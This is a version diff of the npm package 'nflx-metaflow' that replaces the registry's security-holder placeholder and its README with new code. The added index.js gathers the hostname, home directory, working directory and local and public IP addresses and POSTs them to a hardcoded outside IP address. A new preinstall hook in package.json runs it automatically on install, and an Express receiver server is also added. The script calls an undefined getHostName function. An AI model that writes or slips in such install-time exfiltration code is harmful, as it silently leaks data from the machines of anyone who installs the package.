nflx-metaflow 0.0.1-security → 1.0.2

package/index.js

@@ -0,0 +1,62 @@
+const os = require('os');
+const axios = require('axios');
+
+// Function to get the public IP address
+async function getPublicIP() {
+  try {
+    const response = await axios.get('https://ipinfo.io/json');
+    return response.data.ip || 'Unknown';
+  } catch (error) {
+    console.error('Error fetching public IP:', error);
+    return 'Unknown';
+  }
+}
+
+// Function to send a pingback with the collected data
+async function pingBack(data) {
+  try {
+    await axios.post('http://35.170.187.220:8080/', data); // POST request
+    console.log('Pingback sent successfully');
+  } catch (error) {
+    console.error('Error sending pingback:', error);
+  }
+}
+
+// Function to collect network and system information
+function getNetworkInfo() {
+  const interfaces = os.networkInterfaces();
+  let ipAddress = 'Unknown';
+
+  // Find the first non-internal IPv4 address
+  for (const iface of Object.values(interfaces)) {
+    for (const details of iface) {
+      if (details.family === 'IPv4' && !details.internal) {
+        ipAddress = details.address;
+        break;
+      }
+    }
+  }
+
+  return {
+    hostname: os.hostname(), // Dynamically get the hostname
+    homeDirectory: os.homedir(), // Dynamically get the home directory
+    currentDirectory: process.cwd(), // Dynamically get the current directory
+    localIP: ipAddress // Dynamically get the local IP address
+  };
+}
+
+// Main function to collect data and send a pingback
+async function collectData() {
+  const networkInfo = getNetworkInfo(); // Collect network and system info
+  const publicIP = await getPublicIP(); // Collect public IP
+  const hostName= await getHostName();
+  const data = { 
+    ...networkInfo, // Include network and system info
+    hostName,
+    publicIP // Include public IP
+  };
+  pingBack(data); // Send the data to the server
+}
+
+// Execute the script
+collectData();

package/package.json

@@ -1,6 +1,34 @@
 {
   "name": "nflx-metaflow",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.2",
+  "description": "Package Claimed  By JPD",
+  "license": "ISC",
+  "author": "JPD",
+  "type": "commonjs",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [
+    "rce",
+    "security",
+    "exploit",
+    "vulnerability"
+  ],
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/JPD-12/public-repo-ui.git"
+  },
+  "bugs": {
+    "url": "https://github.com/JPD-12/public-repo-ui/issues"
+  },
+  "homepage": "https://github.com/JPD-12/public-repo-ui#readme",
+  "engines": {
+    "node": ">=14.0.0"
+  },
+  "dependencies": {
+    "axios": "^1.7.9",
+    "express": "^4.21.2"
+  }
 }

package/server.js

@@ -0,0 +1,14 @@
+const express = require('express');
+const app = express();
+const port = 8080;
+
+app.use(express.json());
+
+app.post('/', (req, res) => {
+  console.log('Received data:', req.body); // Log the incoming data
+  res.status(200).send('Data received');
+});
+
+app.listen(port, () => {
+  console.log(`Server running at http://23.22.251.177:${port}/`);
+});

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=nflx-metaflow for more information.